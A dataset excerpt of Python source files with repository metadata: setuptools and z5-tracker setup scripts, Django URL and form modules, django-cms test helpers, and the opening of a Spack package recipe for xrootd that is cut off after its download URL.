"include_package_data = setuptools.dist:assert_bool",
"packages = setuptools.dist:check_packages",
"dependency_links = setuptools.dist:assert_string_list",
"test_loader = setuptools.dist:check_importable",
"test_runner = setuptools.dist:check_importable",
"use_2to3 = setuptools.dist:assert_bool",
"convert_2to3_doctests = setuptools.dist:assert_string_list",
"use_2to3_fixers = setuptools.dist:assert_string_list",
"use_2to3_exclude_fixers = setuptools.dist:assert_string_list",
],
"egg_info.writers": [
"PKG-INFO = setuptools.command.egg_info:write_pkg_info",
"requires.txt = setuptools.command.egg_info:write_requirements",
"entry_points.txt = setuptools.command.egg_info:write_entries",
"eager_resources.txt = setuptools.command.egg_info:overwrite_arg",
"namespace_packages.txt = setuptools.command.egg_info:overwrite_arg",
"top_level.txt = setuptools.command.egg_info:write_toplevel_names",
"depends.txt = setuptools.command.egg_info:warn_depends_obsolete",
"dependency_links.txt = setuptools.command.egg_info:overwrite_arg",
],
"console_scripts": console_scripts,
"setuptools.installation":
['eggsecutable = setuptools.command.easy_install:bootstrap'],
},
classifiers=textwrap.dedent("""
Development Status :: 5 - Production/Stable
Intended Audience :: Developers
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python :: 2.6
Programming Language :: Python :: 2.7
Programming Language :: Python :: 3
Programming Language :: Python :: 3.3
Programming Language :: Python :: 3.4
Programming Language :: Python :: 3.5
Topic :: Software Development :: Libraries :: Python Modules
Topic :: System :: Archiving :: Packaging
Topic :: System :: Systems Administration
Topic :: Utilities
""").strip().splitlines(),
extras_require={
"ssl:sys_platform=='win32'": "wincertstore==0.2",
"certs": "certifi==2016.2.28",
},
dependency_links=[
'https://pypi.python.org/packages/source/c/certifi/certifi-2016.2.28.tar.gz#md5=5d672aa766e1f773c75cfeccd02d3650',
'https://pypi.python.org/packages/source/w/wincertstore/wincertstore-0.2.zip#md5=ae728f2f007185648d0c7a8679b361e2',
],
scripts=[],
tests_require=[
'setuptools[ssl]',
'pytest>=2.8',
] + (['mock'] if sys.version_info[:2] < (3, 3) else []),
setup_requires=[
] + sphinx + pytest_runner + wheel,
)
if __name__ == '__main__':
dist = setuptools.setup(**setup_params)
| true | true |
f72ed504ee5e9ff505fb85110a267350133c3f82 | 1,023 | py | Python | 4_utilization/utilization/urls.py | LIkelion-at-KOREATECH/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 28 | 2019-10-15T13:15:26.000Z | 2021-11-08T08:23:45.000Z | 4_utilization/utilization/urls.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | null | null | null | 4_utilization/utilization/urls.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 17 | 2019-09-09T00:15:36.000Z | 2021-01-28T13:08:51.000Z | """utilization URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
import accounts.views
from django.conf import settings
from django.conf.urls.static import static
# Route the admin, the landing page and django-allauth's account views.
# static() additionally serves user-uploaded media from MEDIA_ROOT
# (per Django docs this is a development helper; presumably a no-op with
# DEBUG off -- confirm deployment serves media separately).
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', accounts.views.index, name="index"),
    path('accounts/', include('allauth.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 36.535714 | 77 | 0.723363 | from django.contrib import admin
from django.urls import path, include
import accounts.views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', accounts.views.index, name="index"),
path('accounts/', include('allauth.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| true | true |
f72ed5096c5ea0ad4c05289c8b57172cf413b939 | 665 | py | Python | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 2 | 2019-07-07T00:36:47.000Z | 2020-05-11T10:48:42.000Z | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 5 | 2019-02-09T09:58:06.000Z | 2021-04-30T12:59:09.000Z | setup.py | Feneg/z5-tracker | 4631b33cc6584efcbd8df7e7d635d6ff0b7064fe | [
"MIT"
] | 1 | 2020-05-09T18:50:48.000Z | 2020-05-09T18:50:48.000Z | import setuptools
setuptools.setup(
name='z5-tracker',
version='1.2.1',
author='Feneg',
description='Helper program for Ocarina of Time randomiser',
url='https://www.github.com/feneg/z5-tracker',
packages=setuptools.find_packages(),
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Topic :: Games/Entertainment',
'Topic :: Utilities'],
entry_points={
'gui_scripts': (
'z5-tracker = z5tracker.main:main',
'z5tracker = z5tracker.main:main')}
)
| 30.227273 | 64 | 0.607519 | import setuptools
setuptools.setup(
name='z5-tracker',
version='1.2.1',
author='Feneg',
description='Helper program for Ocarina of Time randomiser',
url='https://www.github.com/feneg/z5-tracker',
packages=setuptools.find_packages(),
include_package_data=True,
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Topic :: Games/Entertainment',
'Topic :: Utilities'],
entry_points={
'gui_scripts': (
'z5-tracker = z5tracker.main:main',
'z5tracker = z5tracker.main:main')}
)
| true | true |
f72ed55ad5ef38ef972e01b4b0f6447434a2d27e | 1,831 | py | Python | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | null | null | null | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | 22 | 2020-11-27T19:05:34.000Z | 2020-12-05T16:50:43.000Z | steambird/teacher/forms.py | rhbvkleef/SteamBird | 6dbbad0750ef918872da18b813669282885b8f95 | [
"BSD-3-Clause"
] | 1 | 2020-11-27T21:08:15.000Z | 2020-11-27T21:08:15.000Z | """
This module contains all forms used in the teacher Views
"""
from django import forms
from django.forms import HiddenInput, MultipleHiddenInput
from django.urls import reverse_lazy
from django_addanother.widgets import AddAnotherWidgetWrapper
from django_select2.forms import ModelSelect2MultipleWidget
from steambird.models.materials import StudyMaterialEdition
from steambird.models.msp import MSPLine
class PrefilledMSPLineForm(forms.ModelForm):
    """ModelForm for an MSPLine whose fields are all pre-filled and hidden.

    Every widget is a hidden input, so the form only carries values
    (set by the view) through the POST round-trip without rendering
    editable controls.
    """

    class Meta:
        model = MSPLine
        fields = [
            "type",
            "msp",
            "comment",
            "materials",
        ]
        widgets = {
            "msp": HiddenInput(),
            "comment": HiddenInput(),
            "materials": MultipleHiddenInput(),
            "type": HiddenInput(),
        }
class PrefilledSuggestAnotherMSPLineForm(forms.ModelForm):
    """ModelForm for an MSPLine where only the materials are editable.

    ``msp`` and ``type`` are fixed by the view (hidden inputs), while
    ``materials`` is a select2 multi-select with an "add another" popup
    that links to the material-creation view.
    """

    class Meta:
        model = MSPLine
        fields = [
            "type",
            "msp",
            "materials",
            "comment",
        ]
        widgets = {
            "msp": HiddenInput(),
            "type": HiddenInput(),
            # Autocomplete searches across names, book metadata (ISBN,
            # author, year) and scientific-article metadata (DOI, author, year).
            "materials": AddAnotherWidgetWrapper(ModelSelect2MultipleWidget(
                queryset=StudyMaterialEdition.objects.all(),
                search_fields=[
                    "name__icontains",
                    "book__ISBN__icontains",
                    "book__author__icontains",
                    "book__year_of_publishing__icontains",
                    "scientificarticle__DOI__icontains",
                    "scientificarticle__author__icontains",
                    "scientificarticle__year_of_publishing__icontains",
                ]
            ), reverse_lazy('material_management:material.create')),
            # TODO: Convert this to a teacher:book.create view when it exists.
        }
| 30.516667 | 78 | 0.588749 |
from django import forms
from django.forms import HiddenInput, MultipleHiddenInput
from django.urls import reverse_lazy
from django_addanother.widgets import AddAnotherWidgetWrapper
from django_select2.forms import ModelSelect2MultipleWidget
from steambird.models.materials import StudyMaterialEdition
from steambird.models.msp import MSPLine
class PrefilledMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"comment",
"materials",
]
widgets = {
"msp": HiddenInput(),
"comment": HiddenInput(),
"materials": MultipleHiddenInput(),
"type": HiddenInput(),
}
class PrefilledSuggestAnotherMSPLineForm(forms.ModelForm):
class Meta:
model = MSPLine
fields = [
"type",
"msp",
"materials",
"comment",
]
widgets = {
"msp": HiddenInput(),
"type": HiddenInput(),
"materials": AddAnotherWidgetWrapper(ModelSelect2MultipleWidget(
queryset=StudyMaterialEdition.objects.all(),
search_fields=[
"name__icontains",
"book__ISBN__icontains",
"book__author__icontains",
"book__year_of_publishing__icontains",
"scientificarticle__DOI__icontains",
"scientificarticle__author__icontains",
"scientificarticle__year_of_publishing__icontains",
]
), reverse_lazy('material_management:material.create')),
}
| true | true |
f72ed5c8bcb24075d3aff50b80d0f1369dcafefb | 12,123 | py | Python | cms/test_utils/testcases.py | jinktv/django-cms | d8c689957f0d098a106829e896e0c91d0c1abd86 | [
"BSD-3-Clause"
] | null | null | null | cms/test_utils/testcases.py | jinktv/django-cms | d8c689957f0d098a106829e896e0c91d0c1abd86 | [
"BSD-3-Clause"
] | 1 | 2021-03-19T15:46:42.000Z | 2021-03-19T15:46:42.000Z | cms/test_utils/testcases.py | jinktv/django-cms | d8c689957f0d098a106829e896e0c91d0c1abd86 | [
"BSD-3-Clause"
] | 1 | 2016-11-07T01:42:14.000Z | 2016-11-07T01:42:14.000Z | # -*- coding: utf-8 -*-
from urlparse import urljoin
import sys
import urllib
import warnings

from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.contrib.sites.models import Site
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.template.context import Context
from django.test import testcases
from django.test.client import RequestFactory
from django.utils.translation import activate

from menus.menu_pool import menu_pool

from cms.compat import User
from cms.models import Page
from cms.test_utils.util.context_managers import (UserLoginContext,
                                                  SettingsOverride)
from cms.utils.permissions import set_current_user
# Admin URL templates used throughout the test suite.  The %d / %s
# placeholders are filled in with page ids and language codes by tests.
URL_CMS_PAGE = "/en/admin/cms/page/"
URL_CMS_PAGE_ADD = urljoin(URL_CMS_PAGE, "add/")
URL_CMS_PAGE_CHANGE = urljoin(URL_CMS_PAGE, "%d/")
URL_CMS_PAGE_CHANGE_LANGUAGE = URL_CMS_PAGE_CHANGE + "?language=%s"
URL_CMS_PAGE_DELETE = urljoin(URL_CMS_PAGE_CHANGE, "delete/")
URL_CMS_PLUGIN_ADD = urljoin(URL_CMS_PAGE_CHANGE, "add-plugin/")
URL_CMS_PLUGIN_EDIT = urljoin(URL_CMS_PAGE_CHANGE, "edit-plugin/")
URL_CMS_PLUGIN_MOVE = urljoin(URL_CMS_PAGE_CHANGE, "move-plugin/")
URL_CMS_PLUGIN_REMOVE = urljoin(URL_CMS_PAGE_CHANGE, "remove-plugin/")
URL_CMS_TRANSLATION_DELETE = urljoin(URL_CMS_PAGE_CHANGE, "delete-translation/")
URL_CMS_PAGE_HISTORY = urljoin(URL_CMS_PAGE_CHANGE, "history/%d/")
URL_CMS_PLUGIN_HISTORY_EDIT = urljoin(URL_CMS_PAGE_HISTORY, "edit-plugin/")
class _Warning(object):
def __init__(self, message, category, filename, lineno):
self.message = message
self.category = category
self.filename = filename
self.lineno = lineno
def _collectWarnings(observeWarning, f, *args, **kwargs):
    """Call ``f(*args, **kwargs)`` while capturing every warning it emits.

    Each emitted warning is wrapped in a :class:`_Warning` and passed to
    ``observeWarning``.  The warning filters and ``warnings.showwarning``
    hook are restored afterwards, and the return value of ``f`` is
    returned.
    """
    def showWarning(message, category, filename, lineno, file=None, line=None):
        # The warnings machinery hands us a Warning instance; record it.
        assert isinstance(message, Warning)
        observeWarning(_Warning(
                message.args[0], category, filename, lineno))

    # Disable the per-module cache for every module otherwise if the warning
    # which the caller is expecting us to collect was already emitted it won't
    # be re-emitted by the call to f which happens below.
    for v in sys.modules.itervalues():
        if v is not None:
            try:
                v.__warningregistry__ = None
            except:
                # Don't specify a particular exception type to handle in case
                # some wacky object raises some wacky exception in response to
                # the setattr attempt.
                pass

    # Save and restore both the filter list and the showwarning hook so the
    # capture has no lasting effect on the process-wide warnings state.
    origFilters = warnings.filters[:]
    origShow = warnings.showwarning
    warnings.simplefilter('always')
    try:
        warnings.showwarning = showWarning
        result = f(*args, **kwargs)
    finally:
        warnings.filters[:] = origFilters
        warnings.showwarning = origShow
    return result
class CMSTestCase(testcases.TestCase):
counter = 1
def _fixture_setup(self):
super(CMSTestCase, self)._fixture_setup()
self.create_fixtures()
activate("en")
def create_fixtures(self):
pass
def _post_teardown(self):
# Needed to clean the menu keys cache, see menu.menu_pool.clear()
menu_pool.clear()
super(CMSTestCase, self)._post_teardown()
set_current_user(None)
def login_user_context(self, user):
return UserLoginContext(self, user)
def get_superuser(self):
try:
admin = User.objects.get(username="admin")
except User.DoesNotExist:
admin = User(username="admin", is_staff=True, is_active=True, is_superuser=True)
admin.set_password("admin")
admin.save()
return admin
def get_staff_user_with_no_permissions(self):
"""
Used in security tests
"""
staff = User(username="staff", is_staff=True, is_active=True)
staff.set_password("staff")
staff.save()
return staff
def get_new_page_data(self, parent_id=''):
page_data = {
'title': 'test page %d' % self.counter,
'slug': 'test-page-%d' % self.counter,
'language': settings.LANGUAGES[0][0],
'template': 'nav_playground.html',
'parent': parent_id,
'site': 1,
}
# required only if user haves can_change_permission
page_data['pagepermission_set-TOTAL_FORMS'] = 0
page_data['pagepermission_set-INITIAL_FORMS'] = 0
page_data['pagepermission_set-MAX_NUM_FORMS'] = 0
page_data['pagepermission_set-2-TOTAL_FORMS'] = 0
page_data['pagepermission_set-2-INITIAL_FORMS'] = 0
page_data['pagepermission_set-2-MAX_NUM_FORMS'] = 0
self.counter = self.counter + 1
return page_data
def get_new_page_data_dbfields(self, parent=None, site=None,
language=None,
template='nav_playground.html',):
page_data = {
'title': 'test page %d' % self.counter,
'slug': 'test-page-%d' % self.counter,
'language': settings.LANGUAGES[0][0] if not language else language,
'template': template,
'parent': parent if parent else None,
'site': site if site else Site.objects.get_current(),
}
self.counter = self.counter + 1
return page_data
def get_pagedata_from_dbfields(self, page_data):
"""Converts data created by get_new_page_data_dbfields to data
created from get_new_page_data so you can switch between test cases
in api.create_page and client.post"""
page_data['site'] = page_data['site'].id
page_data['parent'] = page_data['parent'].id if page_data['parent'] else ''
# required only if user haves can_change_permission
page_data['pagepermission_set-TOTAL_FORMS'] = 0
page_data['pagepermission_set-INITIAL_FORMS'] = 0
page_data['pagepermission_set-MAX_NUM_FORMS'] = 0
page_data['pagepermission_set-2-TOTAL_FORMS'] = 0
page_data['pagepermission_set-2-INITIAL_FORMS'] = 0
page_data['pagepermission_set-2-MAX_NUM_FORMS'] = 0
return page_data
def print_page_structure(self, qs):
"""Just a helper to see the page struct.
"""
for page in qs.order_by('tree_id', 'lft'):
ident = " " * page.level
print "%s%s (%s), lft: %s, rght: %s, tree_id: %s" % (ident, page,
page.pk, page.lft, page.rght, page.tree_id)
def print_node_structure(self, nodes, *extra):
def _rec(nodes, level=0):
ident = level * ' '
for node in nodes:
raw_attrs = [(bit, getattr(node, bit, node.attr.get(bit, "unknown"))) for bit in extra]
attrs = ', '.join(['%s: %r' % data for data in raw_attrs])
print "%s%s: %s" % (ident, node.title, attrs)
_rec(node.children, level + 1)
_rec(nodes)
def assertObjectExist(self, qs, **filter):
try:
return qs.get(**filter)
except ObjectDoesNotExist:
pass
raise self.failureException, "ObjectDoesNotExist raised for filter %s" % filter
def assertObjectDoesNotExist(self, qs, **filter):
try:
qs.get(**filter)
except ObjectDoesNotExist:
return
raise self.failureException, "ObjectDoesNotExist not raised for filter %s" % filter
def copy_page(self, page, target_page):
from cms.utils.page import get_available_slug
data = {
'position': 'last-child',
'target': target_page.pk,
'site': 1,
'copy_permissions': 'on',
'copy_moderation': 'on',
}
response = self.client.post(URL_CMS_PAGE + "%d/copy-page/" % page.pk, data)
self.assertEquals(response.status_code, 200)
# Altered to reflect the new django-js jsonified response messages
self.assertEquals(response.content, '{"status": 200, "content": "ok"}')
title = page.title_set.all()[0]
copied_slug = get_available_slug(title)
copied_page = self.assertObjectExist(Page.objects, title_set__slug=copied_slug, parent=target_page)
return copied_page
def move_page(self, page, target_page, position="first-child"):
page.move_page(target_page, position)
return self.reload_page(page)
def reload_page(self, page):
"""
Returns a fresh instance of the page from the database
"""
return self.reload(page)
def reload(self, obj):
return obj.__class__.objects.get(pk=obj.pk)
def get_pages_root(self):
return urllib.unquote(reverse("pages-root"))
def get_context(self, path=None):
if not path:
path = self.get_pages_root()
context = {}
request = self.get_request(path)
context['request'] = request
return Context(context)
    def get_request(self, path=None, language=None, post_data=None, enforce_csrf_checks=False):
        """Build a bare test ``HttpRequest``.

        :param path: request path; defaults to the pages root
        :param language: language code; defaults to the first entry of
            ``settings.LANGUAGES``
        :param post_data: when given a POST request is built, otherwise GET
        :param enforce_csrf_checks: CSRF checking is disabled unless True
        """
        factory = RequestFactory()
        if not path:
            path = self.get_pages_root()
        if not language:
            language = settings.LANGUAGES[0][0]
        if post_data:
            request = factory.post(path, post_data)
        else:
            request = factory.get(path)
        # Attach what middleware would normally provide on a real request.
        request.session = self.client.session
        request.user = getattr(self, 'user', AnonymousUser())
        request.LANGUAGE_CODE = language
        request._dont_enforce_csrf_checks = not enforce_csrf_checks
        class MockStorage(object):
            # Minimal stand-in for the django.contrib.messages storage so
            # code under test can record messages without the middleware.
            def __len__(self):
                return 0
            def __iter__(self):
                return iter([])
            def add(self, level, message, extra_tags=''):
                pass
            def update(self, response):
                pass
        request._messages = MockStorage()
        return request
    def check_published_page_attributes(self, page):
        """Assert the public (published) version of ``page`` mirrors the
        draft: parent linkage, tree level, and sibling ordering (draft
        siblings that were never published are skipped).
        """
        public_page = page.publisher_public
        if page.parent:
            self.assertEqual(page.parent_id, public_page.parent.publisher_draft.id)
        self.assertEqual(page.level, public_page.level)
        # TODO: add check for siblings
        draft_siblings = list(page.get_siblings(True).filter(
            publisher_is_draft=True
        ).order_by('tree_id', 'parent', 'lft'))
        public_siblings = list(public_page.get_siblings(True).filter(
            publisher_is_draft=False
        ).order_by('tree_id', 'parent', 'lft'))
        skip = 0
        for i, sibling in enumerate(draft_siblings):
            # Unpublished drafts have no public counterpart; offset the
            # index into the public list accordingly.
            if not sibling.publisher_public_id:
                skip += 1
                continue
            self.assertEqual(sibling.id,
                             public_siblings[i - skip].publisher_draft.id)
    def failUnlessWarns(self, category, message, f, *args, **kwargs):
        """Call ``f(*args, **kwargs)`` asserting it emits exactly one kind
        of warning, with the given ``category`` and ``message``; return the
        call's result.
        """
        warningsShown = []
        result = _collectWarnings(warningsShown.append, f, *args, **kwargs)
        if not warningsShown:
            self.fail("No warnings emitted")
        first = warningsShown[0]
        # All captured warnings must agree with the first one.
        for other in warningsShown[1:]:
            if ((other.message, other.category)
                != (first.message, first.category)):
                self.fail("Can't handle different warnings")
        self.assertEqual(first.message, message)
        self.assertTrue(first.category is category)
        return result
    # Alias matching the modern unittest naming convention.
    assertWarns = failUnlessWarns
class SettingsOverrideTestCase(CMSTestCase):
    """CMSTestCase that applies ``settings_overrides`` around each test:
    the override context is entered before test set-up and left after
    tear-down.
    """
    # Mapping of Django setting name -> value to override during the test.
    settings_overrides = {}
    def _pre_setup(self):
        self._enter_settings_override()
        super(SettingsOverrideTestCase, self)._pre_setup()
    def _enter_settings_override(self):
        self._settings_ctx_manager = SettingsOverride(**self.settings_overrides)
        self._settings_ctx_manager.__enter__()
    def _post_teardown(self):
        super(SettingsOverrideTestCase, self)._post_teardown()
        self._exit_settings_override()
    def _exit_settings_override(self):
        self._settings_ctx_manager.__exit__(None, None, None)
| 35.866864 | 107 | 0.635156 |
from cms.models import Page
from cms.test_utils.util.context_managers import (UserLoginContext,
SettingsOverride)
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.template.context import Context
from django.test import testcases
from django.test.client import RequestFactory
from django.utils.translation import activate
from menus.menu_pool import menu_pool
from urlparse import urljoin
import sys
import urllib
import warnings
from cms.utils.permissions import set_current_user
from cms.compat import User
URL_CMS_PAGE = "/en/admin/cms/page/"
URL_CMS_PAGE_ADD = urljoin(URL_CMS_PAGE, "add/")
URL_CMS_PAGE_CHANGE = urljoin(URL_CMS_PAGE, "%d/")
URL_CMS_PAGE_CHANGE_LANGUAGE = URL_CMS_PAGE_CHANGE + "?language=%s"
URL_CMS_PAGE_DELETE = urljoin(URL_CMS_PAGE_CHANGE, "delete/")
URL_CMS_PLUGIN_ADD = urljoin(URL_CMS_PAGE_CHANGE, "add-plugin/")
URL_CMS_PLUGIN_EDIT = urljoin(URL_CMS_PAGE_CHANGE, "edit-plugin/")
URL_CMS_PLUGIN_MOVE = urljoin(URL_CMS_PAGE_CHANGE, "move-plugin/")
URL_CMS_PLUGIN_REMOVE = urljoin(URL_CMS_PAGE_CHANGE, "remove-plugin/")
URL_CMS_TRANSLATION_DELETE = urljoin(URL_CMS_PAGE_CHANGE, "delete-translation/")
URL_CMS_PAGE_HISTORY = urljoin(URL_CMS_PAGE_CHANGE, "history/%d/")
URL_CMS_PLUGIN_HISTORY_EDIT = urljoin(URL_CMS_PAGE_HISTORY, "edit-plugin/")
class _Warning(object):
def __init__(self, message, category, filename, lineno):
self.message = message
self.category = category
self.filename = filename
self.lineno = lineno
def _collectWarnings(observeWarning, f, *args, **kwargs):
def showWarning(message, category, filename, lineno, file=None, line=None):
assert isinstance(message, Warning)
observeWarning(_Warning(
message.args[0], category, filename, lineno))
# be re-emitted by the call to f which happens below.
for v in sys.modules.itervalues():
if v is not None:
try:
v.__warningregistry__ = None
except:
# Don't specify a particular exception type to handle in case
pass
origFilters = warnings.filters[:]
origShow = warnings.showwarning
warnings.simplefilter('always')
try:
warnings.showwarning = showWarning
result = f(*args, **kwargs)
finally:
warnings.filters[:] = origFilters
warnings.showwarning = origShow
return result
class CMSTestCase(testcases.TestCase):
counter = 1
def _fixture_setup(self):
super(CMSTestCase, self)._fixture_setup()
self.create_fixtures()
activate("en")
def create_fixtures(self):
pass
def _post_teardown(self):
menu_pool.clear()
super(CMSTestCase, self)._post_teardown()
set_current_user(None)
def login_user_context(self, user):
return UserLoginContext(self, user)
def get_superuser(self):
try:
admin = User.objects.get(username="admin")
except User.DoesNotExist:
admin = User(username="admin", is_staff=True, is_active=True, is_superuser=True)
admin.set_password("admin")
admin.save()
return admin
def get_staff_user_with_no_permissions(self):
"""
Used in security tests
"""
staff = User(username="staff", is_staff=True, is_active=True)
staff.set_password("staff")
staff.save()
return staff
def get_new_page_data(self, parent_id=''):
page_data = {
'title': 'test page %d' % self.counter,
'slug': 'test-page-%d' % self.counter,
'language': settings.LANGUAGES[0][0],
'template': 'nav_playground.html',
'parent': parent_id,
'site': 1,
}
page_data['pagepermission_set-TOTAL_FORMS'] = 0
page_data['pagepermission_set-INITIAL_FORMS'] = 0
page_data['pagepermission_set-MAX_NUM_FORMS'] = 0
page_data['pagepermission_set-2-TOTAL_FORMS'] = 0
page_data['pagepermission_set-2-INITIAL_FORMS'] = 0
page_data['pagepermission_set-2-MAX_NUM_FORMS'] = 0
self.counter = self.counter + 1
return page_data
def get_new_page_data_dbfields(self, parent=None, site=None,
language=None,
template='nav_playground.html',):
page_data = {
'title': 'test page %d' % self.counter,
'slug': 'test-page-%d' % self.counter,
'language': settings.LANGUAGES[0][0] if not language else language,
'template': template,
'parent': parent if parent else None,
'site': site if site else Site.objects.get_current(),
}
self.counter = self.counter + 1
return page_data
def get_pagedata_from_dbfields(self, page_data):
"""Converts data created by get_new_page_data_dbfields to data
created from get_new_page_data so you can switch between test cases
in api.create_page and client.post"""
page_data['site'] = page_data['site'].id
page_data['parent'] = page_data['parent'].id if page_data['parent'] else ''
page_data['pagepermission_set-TOTAL_FORMS'] = 0
page_data['pagepermission_set-INITIAL_FORMS'] = 0
page_data['pagepermission_set-MAX_NUM_FORMS'] = 0
page_data['pagepermission_set-2-TOTAL_FORMS'] = 0
page_data['pagepermission_set-2-INITIAL_FORMS'] = 0
page_data['pagepermission_set-2-MAX_NUM_FORMS'] = 0
return page_data
def print_page_structure(self, qs):
"""Just a helper to see the page struct.
"""
for page in qs.order_by('tree_id', 'lft'):
ident = " " * page.level
print "%s%s (%s), lft: %s, rght: %s, tree_id: %s" % (ident, page,
page.pk, page.lft, page.rght, page.tree_id)
def print_node_structure(self, nodes, *extra):
def _rec(nodes, level=0):
ident = level * ' '
for node in nodes:
raw_attrs = [(bit, getattr(node, bit, node.attr.get(bit, "unknown"))) for bit in extra]
attrs = ', '.join(['%s: %r' % data for data in raw_attrs])
print "%s%s: %s" % (ident, node.title, attrs)
_rec(node.children, level + 1)
_rec(nodes)
def assertObjectExist(self, qs, **filter):
try:
return qs.get(**filter)
except ObjectDoesNotExist:
pass
raise self.failureException, "ObjectDoesNotExist raised for filter %s" % filter
def assertObjectDoesNotExist(self, qs, **filter):
try:
qs.get(**filter)
except ObjectDoesNotExist:
return
raise self.failureException, "ObjectDoesNotExist not raised for filter %s" % filter
def copy_page(self, page, target_page):
from cms.utils.page import get_available_slug
data = {
'position': 'last-child',
'target': target_page.pk,
'site': 1,
'copy_permissions': 'on',
'copy_moderation': 'on',
}
response = self.client.post(URL_CMS_PAGE + "%d/copy-page/" % page.pk, data)
self.assertEquals(response.status_code, 200)
self.assertEquals(response.content, '{"status": 200, "content": "ok"}')
title = page.title_set.all()[0]
copied_slug = get_available_slug(title)
copied_page = self.assertObjectExist(Page.objects, title_set__slug=copied_slug, parent=target_page)
return copied_page
def move_page(self, page, target_page, position="first-child"):
page.move_page(target_page, position)
return self.reload_page(page)
def reload_page(self, page):
"""
Returns a fresh instance of the page from the database
"""
return self.reload(page)
def reload(self, obj):
return obj.__class__.objects.get(pk=obj.pk)
def get_pages_root(self):
return urllib.unquote(reverse("pages-root"))
def get_context(self, path=None):
if not path:
path = self.get_pages_root()
context = {}
request = self.get_request(path)
context['request'] = request
return Context(context)
def get_request(self, path=None, language=None, post_data=None, enforce_csrf_checks=False):
factory = RequestFactory()
if not path:
path = self.get_pages_root()
if not language:
language = settings.LANGUAGES[0][0]
if post_data:
request = factory.post(path, post_data)
else:
request = factory.get(path)
request.session = self.client.session
request.user = getattr(self, 'user', AnonymousUser())
request.LANGUAGE_CODE = language
request._dont_enforce_csrf_checks = not enforce_csrf_checks
class MockStorage(object):
def __len__(self):
return 0
def __iter__(self):
return iter([])
def add(self, level, message, extra_tags=''):
pass
def update(self, response):
pass
request._messages = MockStorage()
return request
def check_published_page_attributes(self, page):
public_page = page.publisher_public
if page.parent:
self.assertEqual(page.parent_id, public_page.parent.publisher_draft.id)
self.assertEqual(page.level, public_page.level)
draft_siblings = list(page.get_siblings(True).filter(
publisher_is_draft=True
).order_by('tree_id', 'parent', 'lft'))
public_siblings = list(public_page.get_siblings(True).filter(
publisher_is_draft=False
).order_by('tree_id', 'parent', 'lft'))
skip = 0
for i, sibling in enumerate(draft_siblings):
if not sibling.publisher_public_id:
skip += 1
continue
self.assertEqual(sibling.id,
public_siblings[i - skip].publisher_draft.id)
def failUnlessWarns(self, category, message, f, *args, **kwargs):
warningsShown = []
result = _collectWarnings(warningsShown.append, f, *args, **kwargs)
if not warningsShown:
self.fail("No warnings emitted")
first = warningsShown[0]
for other in warningsShown[1:]:
if ((other.message, other.category)
!= (first.message, first.category)):
self.fail("Can't handle different warnings")
self.assertEqual(first.message, message)
self.assertTrue(first.category is category)
return result
assertWarns = failUnlessWarns
class SettingsOverrideTestCase(CMSTestCase):
settings_overrides = {}
def _pre_setup(self):
self._enter_settings_override()
super(SettingsOverrideTestCase, self)._pre_setup()
def _enter_settings_override(self):
self._settings_ctx_manager = SettingsOverride(**self.settings_overrides)
self._settings_ctx_manager.__enter__()
def _post_teardown(self):
super(SettingsOverrideTestCase, self)._post_teardown()
self._exit_settings_override()
def _exit_settings_override(self):
self._settings_ctx_manager.__exit__(None, None, None)
| false | true |
f72ed60ac026397d696947159bb11c0de6f0aad9 | 5,247 | py | Python | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/xrootd/package.py | MiddelkoopT/spack | 4d94c4c4600f42a7a3bb3d06ec879140bc259304 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Xrootd(CMakePackage):
    """The XROOTD project aims at giving high performance, scalable fault
    tolerant access to data repositories of many kinds."""

    homepage = "http://xrootd.org"
    url = "http://xrootd.org/download/v5.0.1/xrootd-5.0.1.tar.gz"

